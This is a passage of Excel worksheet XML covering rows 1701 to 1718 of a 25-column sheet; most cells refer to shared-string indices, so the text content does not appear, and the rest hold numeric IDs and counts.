    <row r="1701" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1701" s="12">
        <v>9293</v>
      </c>
      <c r="B1701" s="12" t="s">
        <v>30836</v>
      </c>
      <c r="D1701" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1701" s="12" t="s">
        <v>31474</v>
      </c>
      <c r="F1701" s="12" t="s">
        <v>30152</v>
      </c>
      <c r="G1701" s="12" t="s">
        <v>12496</v>
      </c>
      <c r="H1701" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1701" s="12" t="s">
        <v>925</v>
      </c>
      <c r="J1701" s="12" t="s">
        <v>926</v>
      </c>
      <c r="K1701" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1701" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1701" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1701" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1701" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1701" s="12" t="s">
        <v>12135</v>
      </c>
      <c r="Q1701" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1701" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1701" s="12" t="s">
        <v>12497</v>
      </c>
      <c r="T1701" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1701" s="12" t="s">
        <v>12498</v>
      </c>
      <c r="V1701" s="12" t="s">
        <v>930</v>
      </c>
      <c r="W1701" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1701" s="12">
        <v>1</v>
      </c>
      <c r="Y1701" s="12" t="s">
        <v>12499</v>
      </c>
    </row>
    <row r="1702" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1702" s="12">
        <v>9294</v>
      </c>
      <c r="B1702" s="12" t="s">
        <v>31035</v>
      </c>
      <c r="D1702" s="12" t="s">
        <v>31515</v>
      </c>
      <c r="E1702" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F1702" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G1702" s="12" t="s">
        <v>12500</v>
      </c>
      <c r="H1702" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1702" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J1702" s="12" t="s">
        <v>166</v>
      </c>
      <c r="K1702" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1702" s="12" t="s">
        <v>11596</v>
      </c>
      <c r="M1702" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N1702" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O1702" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1702" s="12" t="s">
        <v>6633</v>
      </c>
      <c r="Q1702" s="12" t="s">
        <v>28306</v>
      </c>
      <c r="R1702" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1702" s="12" t="s">
        <v>12501</v>
      </c>
      <c r="T1702" s="12" t="s">
        <v>12502</v>
      </c>
      <c r="U1702" s="12" t="s">
        <v>12503</v>
      </c>
      <c r="V1702" s="12" t="s">
        <v>167</v>
      </c>
      <c r="W1702" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1702" s="12">
        <v>2</v>
      </c>
      <c r="Y1702" s="12" t="s">
        <v>12504</v>
      </c>
    </row>
    <row r="1703" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1703" s="12">
        <v>9295</v>
      </c>
      <c r="B1703" s="12" t="s">
        <v>30674</v>
      </c>
      <c r="D1703" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1703" s="12" t="s">
        <v>31541</v>
      </c>
      <c r="F1703" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G1703" s="12" t="s">
        <v>12505</v>
      </c>
      <c r="H1703" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1703" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J1703" s="12" t="s">
        <v>347</v>
      </c>
      <c r="K1703" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1703" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1703" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1703" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1703" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1703" s="12" t="s">
        <v>8228</v>
      </c>
      <c r="Q1703" s="12" t="s">
        <v>28283</v>
      </c>
      <c r="R1703" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1703" s="12" t="s">
        <v>12506</v>
      </c>
      <c r="T1703" s="12" t="s">
        <v>12507</v>
      </c>
      <c r="U1703" s="12" t="s">
        <v>12508</v>
      </c>
      <c r="V1703" s="12" t="s">
        <v>6839</v>
      </c>
      <c r="W1703" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1703" s="12">
        <v>3</v>
      </c>
      <c r="Y1703" s="12" t="s">
        <v>12509</v>
      </c>
    </row>
    <row r="1704" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1704" s="12">
        <v>9296</v>
      </c>
      <c r="B1704" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1704" s="12" t="s">
        <v>30300</v>
      </c>
      <c r="E1704" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F1704" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G1704" s="12" t="s">
        <v>12510</v>
      </c>
      <c r="H1704" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1704" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1704" s="12" t="s">
        <v>194</v>
      </c>
      <c r="K1704" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1704" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1704" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1704" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1704" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1704" s="12" t="s">
        <v>12511</v>
      </c>
      <c r="Q1704" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1704" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1704" s="12" t="s">
        <v>12512</v>
      </c>
      <c r="T1704" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1704" s="12" t="s">
        <v>12513</v>
      </c>
      <c r="V1704" s="12" t="s">
        <v>4704</v>
      </c>
      <c r="W1704" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1704" s="12">
        <v>3</v>
      </c>
      <c r="Y1704" s="12" t="s">
        <v>12514</v>
      </c>
    </row>
    <row r="1705" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1705" s="12">
        <v>9306</v>
      </c>
      <c r="B1705" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1705" s="12" t="s">
        <v>31271</v>
      </c>
      <c r="E1705" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F1705" s="12" t="s">
        <v>31272</v>
      </c>
      <c r="G1705" s="12" t="s">
        <v>12520</v>
      </c>
      <c r="H1705" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1705" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1705" s="12" t="s">
        <v>591</v>
      </c>
      <c r="K1705" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1705" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1705" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1705" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1705" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1705" s="12" t="s">
        <v>12521</v>
      </c>
      <c r="Q1705" s="12">
        <v>2.4</v>
      </c>
      <c r="R1705" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1705" s="12" t="s">
        <v>12522</v>
      </c>
      <c r="T1705" s="12" t="s">
        <v>12523</v>
      </c>
      <c r="U1705" s="12" t="s">
        <v>12524</v>
      </c>
      <c r="V1705" s="12" t="s">
        <v>117</v>
      </c>
      <c r="W1705" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1705" s="12">
        <v>9</v>
      </c>
      <c r="Y1705" s="12" t="s">
        <v>12525</v>
      </c>
    </row>
    <row r="1706" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1706" s="12">
        <v>9320</v>
      </c>
      <c r="B1706" s="12" t="s">
        <v>31035</v>
      </c>
      <c r="D1706" s="18" t="s">
        <v>28349</v>
      </c>
      <c r="E1706" s="18" t="s">
        <v>31426</v>
      </c>
      <c r="F1706" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G1706" s="12" t="s">
        <v>12526</v>
      </c>
      <c r="H1706" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1706" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J1706" s="12" t="s">
        <v>2609</v>
      </c>
      <c r="K1706" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1706" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1706" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1706" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1706" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1706" s="12" t="s">
        <v>12527</v>
      </c>
      <c r="Q1706" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1706" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1706" s="12" t="s">
        <v>12528</v>
      </c>
      <c r="T1706" s="12" t="s">
        <v>12529</v>
      </c>
      <c r="U1706" s="12" t="s">
        <v>12530</v>
      </c>
      <c r="V1706" s="12" t="s">
        <v>5765</v>
      </c>
      <c r="W1706" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1706" s="12">
        <v>54</v>
      </c>
      <c r="Y1706" s="12" t="s">
        <v>12531</v>
      </c>
    </row>
    <row r="1707" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1707" s="12">
        <v>9321</v>
      </c>
      <c r="B1707" s="12" t="s">
        <v>28356</v>
      </c>
      <c r="C1707" s="12" t="s">
        <v>28357</v>
      </c>
      <c r="D1707" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E1707" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F1707" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="G1707" s="12" t="s">
        <v>12532</v>
      </c>
      <c r="H1707" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1707" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1707" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K1707" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1707" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1707" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1707" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1707" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1707" s="12" t="s">
        <v>12135</v>
      </c>
      <c r="Q1707" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1707" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1707" s="12" t="s">
        <v>12533</v>
      </c>
      <c r="T1707" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1707" s="12" t="s">
        <v>12534</v>
      </c>
      <c r="V1707" s="12" t="s">
        <v>995</v>
      </c>
      <c r="W1707" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1707" s="12">
        <v>6</v>
      </c>
      <c r="Y1707" s="12" t="s">
        <v>12535</v>
      </c>
    </row>
    <row r="1708" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1708" s="12">
        <v>9322</v>
      </c>
      <c r="B1708" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1708" s="12" t="s">
        <v>30300</v>
      </c>
      <c r="E1708" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F1708" s="12" t="s">
        <v>30302</v>
      </c>
      <c r="G1708" s="12" t="s">
        <v>12536</v>
      </c>
      <c r="H1708" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1708" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J1708" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K1708" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1708" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1708" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1708" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1708" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1708" s="12" t="s">
        <v>12135</v>
      </c>
      <c r="Q1708" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1708" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1708" s="12" t="s">
        <v>12537</v>
      </c>
      <c r="T1708" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1708" s="12" t="s">
        <v>12538</v>
      </c>
      <c r="V1708" s="12" t="s">
        <v>3916</v>
      </c>
      <c r="W1708" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1708" s="12">
        <v>5</v>
      </c>
      <c r="Y1708" s="12" t="s">
        <v>12539</v>
      </c>
    </row>
    <row r="1709" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1709" s="12">
        <v>9327</v>
      </c>
      <c r="B1709" s="12" t="s">
        <v>30837</v>
      </c>
      <c r="D1709" s="12" t="s">
        <v>30823</v>
      </c>
      <c r="E1709" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F1709" s="12" t="s">
        <v>30152</v>
      </c>
      <c r="G1709" s="12" t="s">
        <v>12544</v>
      </c>
      <c r="H1709" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1709" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J1709" s="12" t="s">
        <v>9219</v>
      </c>
      <c r="K1709" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1709" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1709" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1709" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1709" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1709" s="12" t="s">
        <v>12308</v>
      </c>
      <c r="Q1709" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1709" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1709" s="12" t="s">
        <v>12545</v>
      </c>
      <c r="T1709" s="12" t="s">
        <v>12546</v>
      </c>
      <c r="U1709" s="12" t="s">
        <v>12547</v>
      </c>
      <c r="V1709" s="12" t="s">
        <v>3725</v>
      </c>
      <c r="W1709" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1709" s="12">
        <v>28</v>
      </c>
      <c r="Y1709" s="12" t="s">
        <v>12548</v>
      </c>
    </row>
    <row r="1710" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1710" s="12">
        <v>9329</v>
      </c>
      <c r="B1710" s="12" t="s">
        <v>31309</v>
      </c>
      <c r="C1710" s="12" t="s">
        <v>31423</v>
      </c>
      <c r="D1710" s="12" t="s">
        <v>31310</v>
      </c>
      <c r="F1710" s="12" t="s">
        <v>31306</v>
      </c>
      <c r="G1710" s="12" t="s">
        <v>12554</v>
      </c>
      <c r="H1710" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1710" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J1710" s="12" t="s">
        <v>12555</v>
      </c>
      <c r="K1710" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1710" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1710" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1710" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1710" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1710" s="12" t="s">
        <v>12135</v>
      </c>
      <c r="Q1710" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1710" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1710" s="12" t="s">
        <v>12556</v>
      </c>
      <c r="T1710" s="12" t="s">
        <v>9999</v>
      </c>
      <c r="U1710" s="12" t="s">
        <v>12557</v>
      </c>
      <c r="V1710" s="12" t="s">
        <v>293</v>
      </c>
      <c r="W1710" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1710" s="12">
        <v>2</v>
      </c>
      <c r="Y1710" s="12" t="s">
        <v>12558</v>
      </c>
    </row>
    <row r="1711" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1711" s="12">
        <v>9331</v>
      </c>
      <c r="B1711" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1711" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1711" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F1711" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G1711" s="12" t="s">
        <v>12559</v>
      </c>
      <c r="H1711" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1711" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J1711" s="12" t="s">
        <v>1203</v>
      </c>
      <c r="K1711" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1711" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1711" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1711" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1711" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1711" s="12" t="s">
        <v>12308</v>
      </c>
      <c r="Q1711" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1711" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1711" s="12" t="s">
        <v>12560</v>
      </c>
      <c r="T1711" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1711" s="12" t="s">
        <v>12561</v>
      </c>
      <c r="V1711" s="12" t="s">
        <v>4773</v>
      </c>
      <c r="W1711" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1711" s="12">
        <v>1</v>
      </c>
      <c r="Y1711" s="12" t="s">
        <v>12562</v>
      </c>
    </row>
    <row r="1712" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1712" s="12">
        <v>9335</v>
      </c>
      <c r="B1712" s="12" t="s">
        <v>29958</v>
      </c>
      <c r="C1712" s="12" t="s">
        <v>29959</v>
      </c>
      <c r="D1712" s="12" t="s">
        <v>29950</v>
      </c>
      <c r="E1712" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F1712" s="12" t="s">
        <v>29961</v>
      </c>
      <c r="G1712" s="12" t="s">
        <v>12564</v>
      </c>
      <c r="H1712" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1712" s="12" t="s">
        <v>28</v>
      </c>
      <c r="J1712" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K1712" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1712" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1712" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1712" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1712" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1712" s="12" t="s">
        <v>12308</v>
      </c>
      <c r="Q1712" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1712" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1712" s="12" t="s">
        <v>12565</v>
      </c>
      <c r="T1712" s="12" t="s">
        <v>12566</v>
      </c>
      <c r="U1712" s="12" t="s">
        <v>12567</v>
      </c>
      <c r="V1712" s="12" t="s">
        <v>93</v>
      </c>
      <c r="W1712" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1712" s="12">
        <v>21</v>
      </c>
      <c r="Y1712" s="12" t="s">
        <v>12568</v>
      </c>
    </row>
    <row r="1713" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1713" s="12">
        <v>9338</v>
      </c>
      <c r="B1713" s="12" t="s">
        <v>31035</v>
      </c>
      <c r="D1713" s="12" t="s">
        <v>31047</v>
      </c>
      <c r="F1713" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G1713" s="12" t="s">
        <v>12569</v>
      </c>
      <c r="H1713" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1713" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1713" s="12" t="s">
        <v>422</v>
      </c>
      <c r="K1713" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1713" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1713" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1713" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1713" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1713" s="12" t="s">
        <v>11920</v>
      </c>
      <c r="Q1713" s="12" t="s">
        <v>28306</v>
      </c>
      <c r="R1713" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1713" s="12" t="s">
        <v>12570</v>
      </c>
      <c r="T1713" s="12" t="s">
        <v>12571</v>
      </c>
      <c r="U1713" s="12" t="s">
        <v>12572</v>
      </c>
      <c r="V1713" s="12" t="s">
        <v>2476</v>
      </c>
      <c r="W1713" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1713" s="12">
        <v>9</v>
      </c>
      <c r="Y1713" s="12" t="s">
        <v>12573</v>
      </c>
    </row>
    <row r="1714" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1714" s="12">
        <v>9345</v>
      </c>
      <c r="B1714" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1714" s="12" t="s">
        <v>30300</v>
      </c>
      <c r="E1714" s="12" t="s">
        <v>31468</v>
      </c>
      <c r="F1714" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G1714" s="12" t="s">
        <v>12578</v>
      </c>
      <c r="H1714" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1714" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J1714" s="12" t="s">
        <v>6599</v>
      </c>
      <c r="K1714" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1714" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1714" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1714" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1714" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1714" s="12" t="s">
        <v>12308</v>
      </c>
      <c r="Q1714" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1714" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1714" s="12" t="s">
        <v>12579</v>
      </c>
      <c r="T1714" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1714" s="12" t="s">
        <v>12580</v>
      </c>
      <c r="V1714" s="12" t="s">
        <v>4689</v>
      </c>
      <c r="W1714" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1714" s="12">
        <v>23</v>
      </c>
      <c r="Y1714" s="12" t="s">
        <v>12581</v>
      </c>
    </row>
    <row r="1715" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1715" s="12">
        <v>9346</v>
      </c>
      <c r="B1715" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1715" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1715" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F1715" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G1715" s="12" t="s">
        <v>12582</v>
      </c>
      <c r="H1715" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1715" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J1715" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K1715" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1715" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1715" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1715" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1715" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1715" s="12" t="s">
        <v>12135</v>
      </c>
      <c r="Q1715" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1715" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1715" s="12" t="s">
        <v>12583</v>
      </c>
      <c r="T1715" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1715" s="12" t="s">
        <v>12584</v>
      </c>
      <c r="V1715" s="12" t="s">
        <v>5765</v>
      </c>
      <c r="W1715" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1715" s="12">
        <v>70</v>
      </c>
      <c r="Y1715" s="12" t="s">
        <v>12585</v>
      </c>
    </row>
    <row r="1716" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1716" s="12">
        <v>9347</v>
      </c>
      <c r="B1716" s="12" t="s">
        <v>30674</v>
      </c>
      <c r="D1716" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1716" s="12" t="s">
        <v>31454</v>
      </c>
      <c r="F1716" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G1716" s="12" t="s">
        <v>12586</v>
      </c>
      <c r="H1716" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1716" s="12" t="s">
        <v>925</v>
      </c>
      <c r="J1716" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K1716" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1716" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1716" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1716" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1716" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1716" s="12" t="s">
        <v>11920</v>
      </c>
      <c r="Q1716" s="12" t="s">
        <v>28306</v>
      </c>
      <c r="R1716" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1716" s="12" t="s">
        <v>12587</v>
      </c>
      <c r="T1716" s="12" t="s">
        <v>8119</v>
      </c>
      <c r="U1716" s="12" t="s">
        <v>12588</v>
      </c>
      <c r="V1716" s="12" t="s">
        <v>12589</v>
      </c>
      <c r="W1716" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1716" s="12">
        <v>5</v>
      </c>
      <c r="Y1716" s="12" t="s">
        <v>12590</v>
      </c>
    </row>
    <row r="1717" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1717" s="12">
        <v>9348</v>
      </c>
      <c r="B1717" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1717" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1717" s="12" t="s">
        <v>31451</v>
      </c>
      <c r="F1717" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G1717" s="12" t="s">
        <v>12591</v>
      </c>
      <c r="H1717" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1717" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J1717" s="12" t="s">
        <v>23</v>
      </c>
      <c r="K1717" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1717" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1717" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1717" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1717" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1717" s="12" t="s">
        <v>12135</v>
      </c>
      <c r="Q1717" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1717" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1717" s="12" t="s">
        <v>12592</v>
      </c>
      <c r="T1717" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1717" s="12" t="s">
        <v>12593</v>
      </c>
      <c r="V1717" s="12" t="s">
        <v>3738</v>
      </c>
      <c r="W1717" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1717" s="12">
        <v>1</v>
      </c>
      <c r="Y1717" s="12" t="s">
        <v>12594</v>
      </c>
    </row>
    <row r="1718" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1718" s="12">
        <v>9352</v>
      </c>
      <c r="B1718" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C1718" s="12" t="s">
        <v>31075</v>
      </c>
      <c r="D1718" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1718" s="12" t="s">
        <v>31474</v>
      </c>
      <c r="F1718" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G1718" s="12" t="s">
        <v>12608</v>
      </c>
      <c r="H1718" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1718" s="12" t="s">
        <v>925</v>
      </c>
      <c r="J1718" s="12" t="s">
        <v>926</v>
      </c>
      <c r="K1718" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L1718" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M1718" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1718" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1718" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P1718" s="12" t="s">
        <v>12609</v>
      </c>
      <c r="Q1718" s="12" t="s">
        <v>28307</v>
      </c>
      <c r="R1718" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1718" s="12" t="s">
        <v>12610</v>
      </c>
      <c r="T1718" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U1718" s="12" t="s">
        <v>12611</v>
      </c>
      <c r="V1718" s="12" t="s">
        <v>5069</v>
      </c>
      <c r="W1718" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1718" s="12">
        <v>2</v>
      </c>
      <c r="Y1718" s="12" t="s">
        <v>12612</v>
      </c>
    </row>
    <row r="1719" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
